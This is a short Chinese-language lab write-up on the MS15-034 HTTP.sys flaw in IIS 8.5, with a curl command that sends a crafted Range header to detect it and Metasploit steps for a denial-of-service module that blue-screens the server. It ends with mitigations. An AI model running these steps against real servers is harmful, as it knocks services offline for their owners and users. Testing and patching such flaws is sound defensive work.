一、 测试环境
ip: 192.168.80.200
操作系统:win2012
中间件:IIS8.5
二、 漏洞背景
漏洞详细参考如下信息:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
三、 验证
在验证机机发送如下代码:
curl -v 192.168.80.200 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"
报HTTP Error 416. The requested range is not satisfiable状态码,证明此处存在此漏洞。
四、 验证机利用
工具用Metasploit(MSF)。
1. 利用search ms15-034命令搜索MFS模块
两个模块
0 ddos验证机
1 读取内存信息
2. 使用use auxiliary/dos/http/ms15_034_ulonglongadd调用模块0
3. 使用SET设置参数
如果是默认,直接run,服务器会瞬间蓝屏,然后重启,如果是改成set therads 10,服务器会长时间蓝屏。
4. 使用RUN 运行
五、 结果
六、 防御措施
1.打补丁
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
2.临时禁用IIS内核缓存